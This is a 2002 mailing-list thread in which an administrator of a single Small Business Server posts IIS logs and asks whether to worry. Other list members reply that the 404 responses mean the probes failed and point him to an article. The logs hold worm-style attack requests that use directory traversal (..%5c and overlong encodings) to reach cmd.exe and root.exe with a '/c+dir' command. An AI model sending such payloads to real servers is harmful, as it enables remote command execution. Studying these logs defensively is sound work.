RE: !!!!URGENT - SCARY website LOGS!!!!

  • From: "Joseph" <cismic@xxxxxxx>
  • To: "'[ISAserver.org Discussion List]'" <isalist@xxxxxxxxxxxxx>
  • Date: Wed, 27 Mar 2002 00:54:11 -0800

Hi Sushil,

Tom Shinder wrote an article on SBS that you can find
at this URL: http://www.tacteam.net/isaserverorg/sbsisa.htm

Joseph

-----Original Message-----
From: Sushil Bhalla [mailto:sushilb@xxxxxxxxxxxxxxxxx] 
Sent: Tuesday, March 26, 2002 11:09 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: !!!!URGENT - SCARY website LOGS!!!!

http://www.ISAserver.org


Thanks very much Joseph for your comments.

Actually, I would like to have W2K, E2K, ISA, ISM all on separate servers
but I have SBS which limits me to one server only. If there is a way
around this problem, please let me know. I will be very much interested in
having all the processes on separate servers.

Regards,

Sushil Bhalla


> It is not always a good idea to keep ISA on the same machine with all
> the other applications that you mentioned.
> The 404 error code says that you're OK, meaning URL not found.
> 
> Joseph
> 
> -----Original Message-----
> From: Sushil Bhalla [mailto:sushilb@xxxxxxxxxxxxxxxxx]
> Sent: Tuesday, March 26, 2002 10:07 PM
> To: [ISAserver.org Discussion List]
> Subject: [isalist] !!!!URGENT - SCARY website LOGS!!!!
> 
> 
> Hello All,
> 
> I have W2K, E2K, ISA2K, ISM all installed on one server.
> 
> Recently I have allowed inbound HTTPServer Inbound (port 80) connection
> (through ISA PACKET FILTERING) to allow my website to be viewed and after
> going through my website logs, I got very worried.
> 
> Following is what I am getting in my logs every few hours.
> 
> Can someone tell me URGENTLY what kind of requests are these? Should I be
> worried? What can I do to prevent these?
> 
> Thanks in advance for any help.
> 
> Sushil Bhalla
> 
> #Date: 2002-03-27 00:19:03
> #Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes cs-bytes time-taken cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)
> 2002-03-27 00:19:03 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/root.exe /c+dir 404 3 3396 72 15 HTTP/1.0 www - - -
> 2002-03-27 00:19:04 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /MSADC/root.exe /c+dir 404 3 3396 70 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:09 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /c/winnt/system32/cmd.exe /c+dir 404 3 3396 80 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:10 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /d/winnt/system32/cmd.exe /c+dir 404 3 3396 80 16 HTTP/1.0 www - - -
> 2002-03-27 00:19:11 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 96 16 HTTP/1.0 www - - -
> 2002-03-27 00:19:14 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 117 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:19 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 117 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:20 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /msadc/..%5c../..%5c../..%5c/..=C1=1C../..=C1=1C../..=C1=1C../winnt/system32/cmd.exe /c+dir 404 3 3396 145 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:22 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/..=C1=1C../winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:23 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 3 3396 97 15 HTTP/1.0 www - - -
> 2002-03-27 00:19:25 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:27 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /winnt/system32/cmd.exe /c+dir 404 3 3396 97 16 HTTP/1.0 www - - -
> 
> ------------------------------------------------------
> You are currently subscribed to this ISAserver.org Discussion List as:
> cismic@xxxxxxx
> To unsubscribe send a blank email to $subst('Email.Unsub')
